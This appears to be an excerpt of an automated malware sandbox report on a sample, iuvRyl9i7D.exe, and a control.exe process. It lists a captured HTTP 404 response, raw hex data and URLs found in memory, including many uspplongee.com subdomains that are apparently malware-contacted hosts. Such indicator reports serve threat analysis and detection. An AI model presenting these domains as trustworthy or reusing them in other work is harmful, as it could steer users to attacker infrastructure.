61 70 53 57 4d 78 5a 30 62 28 7a 30 76 31 44 6a 35 44 6c 74 57 45 38 6e 59 47 4c 7e 35 66 78 4e 53 4e 52 62 74 6d 77 74 34 43 37 4c 76 66 69 57 47 5a 62 64 51 61 62 70 75 45 51 4a 62 73 57 36 63 78 33 74 4a 6e 57 64 30 6c 54 39 78 59 76 63 46 38 53 5a 47 51 62 6e 38 65 6c 61 65 6f 35 63 4c 79 31 67 5f 43 4f 73 56 7a 75 4b 52 64 57 42 73 76 47 31 68 6c 6b 35 4f 70 70 52 37 4d 45 73 51 4b 47 69 63 4c 77 45 35 53 62 6e 73 72 70 6b 42 7a 68 50 68 64 54 4a 70 63 39 37 45 7e 30 79 73 49 46 50 6f 39 73 32 68 4f 74 4d 68 73 6b 48 6b 75 33 66 34 46 47 76 4b 72 43 46 4a 39 75 66 59 43 59 4b 79 6b 69 47 39 49 71 50 54
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 13:30:03 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ansu.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://difo.uspplongee.com/
          Source: iuvRyl9i7D.exe, 00000000.00000003.247473983.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.wi5
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://epa.uspplongee.com/
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://genzi.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://gonglang.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://haileng.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://hanyang.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://kace.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://kuaicong.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://maipu.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://meilong.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://mianta.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://nanmang.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://penjian.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://qiangai.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://qunben.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://randu.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://rechan.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://sangdu.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://sanque.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://saoshui.uspplongee.com/
          Source: iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://shangeng.uspplongee.com/
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico%
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://tanshuan.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://tuikun.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://weimen.uspplongee.com/
          Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://wudie.uspplongee.com/
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
          Source: iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comadd
          Source: iuvRyl9i7D.exe, 00000000.00000003.247918771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248081116.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248025845.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247762585.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247959832.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247722223.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247738889.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247797263.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247783561.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247944619.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247751500.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247697909.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248000108.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247981605.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comdd
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn-u
          Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250459267.0000000005F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/Z
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmlZ
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersC
          Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersV
          Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250566915.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250528449.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250632388.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250598952.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250706232.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com:
          Source: iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300243537.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF:
          Source: iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comFU
          Source: iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253383810.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253224001.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253128451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253153122.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253083922.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253314080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253110391.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253363848.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF:
          Source: iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250747109.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250726008.0000000005F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comW.TTF
          Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250459267.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalic
          Source: iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253054220.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals(
